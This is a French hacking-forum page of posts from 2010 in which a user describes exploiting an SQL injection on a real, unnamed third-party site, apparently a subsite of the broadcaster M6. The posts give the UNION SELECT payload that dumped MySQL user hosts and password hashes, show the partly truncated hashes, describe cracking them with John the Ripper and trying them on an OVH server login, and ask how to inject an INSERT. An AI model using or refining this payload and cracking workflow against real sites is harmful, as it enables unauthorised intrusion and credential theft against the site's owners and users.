logo Homepage
+  NewbieContest
Username:
Password:
Accueil Aide Rechercher Identifiez-vous Inscrivez-vous
  Voir les messages
Pages: [1]
1  Divers / Hacking / Re : Mots de passe Mysql le: 25 Septembre 2010 à 18:27:22
sur un site annexe de M6 plus précisément. Pourquoi prendre ce ton la Barti ?
Merci pour vos réponses
2  Divers / Hacking / Re : Mots de passe Mysql le: 25 Septembre 2010 à 15:55:49
aure petite question: Est ce qu'il y a un moyen de faire un INSERT INTO à la suite d'un SELECT? avec un UNION ou un AND par exemple?
3  Divers / Hacking / Re : Mots de passe Mysql le: 25 Septembre 2010 à 15:14:22
Merci pour vos réponses. John ne veux pas se lancer avec plusieurs MDP en meme temps chez moi, voila pourquoi j'ai pris que le premier.

Du coup j'ai un doute sur le format que je dois donner à john :

Citation
DES/BSDI/MD5/BF/AFS/LM/NT/PO/raw-MD5/IPB2/raw-sha1/salt-sha1/md5a/KRB5/bfegg/nsldap/ssha/oracle/MYSQL/mysql-sha1/mscash/lotus5/DOMINOSEC/NETLM/NETNTLM/mssql/mssql05

Il s'est lancé en raw-sha1 mais est ce qu'il va pouvoir le trouver étant donné que l'algorithme de hashage de MySQL ressemblerait à ca d'après ce que j'ai lu :

Code:
function mysql_41_password($in)
{
$p=sha1($in,true);
$p=sha1($p);
return "*".strtoupper($p);
}
4  Divers / Hacking / Re : Mots de passe Mysql le: 25 Septembre 2010 à 14:25:38
Il me semblait qu'on pouvait accéder directement à la BDD de son serveur avec ce type d'adresse ns000000.ovh.net.
Merci pour ta réponse en tout cas. C'est vrai que les étoiles sont bizarre. Peut être que quelqu'un qui a un serveur chez OVH pourra m'en dire plus.
5  Divers / Hacking / Mots de passe Mysql le: 25 Septembre 2010 à 13:45:43
Bonjour

En fouillant un peu sur un site, j'ai trouvé une faille de type injection SQL. J'ai réussi à afficher le nom des tables et leur contenu.
A tout hasard je tente d'afficher les mots de passe BDD avec la formule qui marche jamais :

Citation
UNION SELECT 1,2,3,4,5,6,7,8,group_concat(host,0x3a,user,0x3a,password) from mysql.user--

Et il me sort les mots de passe...

Citation
localhost:root:*263D2170B73A27145FB[tronqué]
ns000000.ovh.net:root:*263D2170B73A27145FBB[tronqué] (j'ai rajouté les 0 mais j'ai l'adresse complète OVH)
127.0.0.1:root:*263D2170B73A27145FBB5[tronqué]
%:tempo:*627DB5DCC5B5AD5BA94[tronqué]
localhost:nom_de_compte:*D6EA5B04F792AB4985CC72A[tronqué]
%:autre_nom_de_compte:*678E265E9481438F90A2477[tronqué]
62.4.16.%:dernier_nom_de_compte:6be769f24e0[tronqué]

J'ai plusieurs questions par rapport à ca.
Pourquoi les mots de passe sont il encrypté ? J'ai fait tourner JTR toute la nuit avec le premier MDP mais sans résultat
Citation
Loaded 1 password hash (Raw SHA1 [raw-sha1 SSE2])

Quand je vais à cette adresse "ns000000.ovh.net" il me demande login/pass. J'ai essayé toute les combinaisons trouvé plus et rien ne marche... Il y a aussi cette ligne qui ne ressemble pas au autre "62.4.16.%:dernier_nom_de_compte:6be769f24e0[tronqué]" qu'est ce que c'est ?

Merci d'avance pour vos réponses
Pages: [1]
Powered by SMF 1.1.21 | SMF © 2006-2011, Simple Machines MySQL | PHP | XHTML | CSS